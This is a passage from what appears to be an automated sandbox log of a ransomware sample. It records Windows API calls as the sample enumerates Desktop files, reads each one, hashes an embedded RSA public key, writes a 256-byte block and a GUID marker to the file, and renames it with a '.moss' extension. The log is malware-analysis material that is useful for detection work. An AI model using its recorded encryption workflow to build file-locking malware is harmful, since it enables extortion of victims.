KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.193] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.195] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.195] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.195] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.195] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.195] GetLastError () returned 0x0 [0169.196] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.196] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.196] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.196] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.196] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.197] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b449a8 [0169.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b53ea8 [0169.198] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9681, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.198] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.198] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.198] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.198] CloseHandle (hObject=0x664) returned 1 [0169.216] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.216] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.221] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\grGgx5k9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\grggx5k9.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\grGgx5k9.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\grggx5k9.mp3.moss")) returned 1 [0169.223] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61f571f0, ftCreationTime.dwHighDateTime=0x1d5de90, ftLastAccessTime.dwLowDateTime=0x6afbd6a0, ftLastAccessTime.dwHighDateTime=0x1d5e7f9, ftLastWriteTime.dwLowDateTime=0x6afbd6a0, ftLastWriteTime.dwHighDateTime=0x1d5e7f9, nFileSizeHigh=0x0, nFileSizeLow=0xae91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HdK_33dFTHF oYByX3m.gif", cAlternateFileName="HDK_33~1.GIF")) returned 1 [0169.223] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.223] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.223] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HdK_33dFTHF oYByX3m.gif") returned=".gif" [0169.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HdK_33dFTHF oYByX3m.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hdk_33dfthf oybyx3m.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.224] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=44689) returned 1 [0169.224] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.228] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xae6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.228] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.230] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.230] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.230] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.230] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xae91, lpOverlapped=0x0) returned 1 [0169.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.230] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.231] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.231] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.232] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.232] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.232] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.232] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.232] GetLastError () returned 0x0 [0169.233] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.233] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.233] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.233] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.233] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.233] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.233] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xae90) returned 0x3b53ea8 [0169.233] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.233] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b452c0 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd50 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45308 [0169.233] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd68 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd98 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdb0 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.234] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.234] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd98 | out: hHeap=0xcd0000) returned 1 [0169.234] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdb0 | out: hHeap=0xcd0000) returned 1 [0169.234] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.234] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.234] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdb0 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbd98 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.234] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdb0 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd98 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.235] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.235] GetCurrentThreadId () returned 0x324 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31d30 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.235] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.236] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xae91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.236] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.236] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.236] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.236] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.237] CloseHandle (hObject=0x664) returned 1 [0169.238] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HdK_33dFTHF oYByX3m.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hdk_33dfthf oybyx3m.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HdK_33dFTHF oYByX3m.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hdk_33dfthf oybyx3m.gif.moss")) returned 1 [0169.239] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.239] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.239] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.240] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec81a810, ftCreationTime.dwHighDateTime=0x1d5d932, ftLastAccessTime.dwLowDateTime=0xc6b86570, ftLastAccessTime.dwHighDateTime=0x1d5d91d, ftLastWriteTime.dwLowDateTime=0xc6b86570, ftLastWriteTime.dwHighDateTime=0x1d5d91d, nFileSizeHigh=0x0, nFileSizeLow=0xab93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hmA9JJhbA0oQ6ovas.mp3", cAlternateFileName="HMA9JJ~1.MP3")) returned 1 [0169.240] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmA9JJhbA0oQ6ovas.mp3") returned=".mp3" [0169.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmA9JJhbA0oQ6ovas.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hma9jjhba0oq6ovas.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.240] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=43923) returned 1 [0169.240] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.244] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xab6d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.244] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.246] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xab93, lpOverlapped=0x0) returned 1 [0169.246] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.246] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.246] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.246] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.248] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.248] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.248] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.248] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.248] GetLastError () returned 0x0 [0169.248] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.248] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.248] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.249] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.249] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.249] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.249] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.249] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b447b0 [0169.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdb0 | out: hHeap=0xcd0000) returned 1 [0169.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdc8 | out: hHeap=0xcd0000) returned 1 [0169.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.249] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.249] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.249] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.249] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdc8 [0169.249] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbdb0 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.250] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.250] 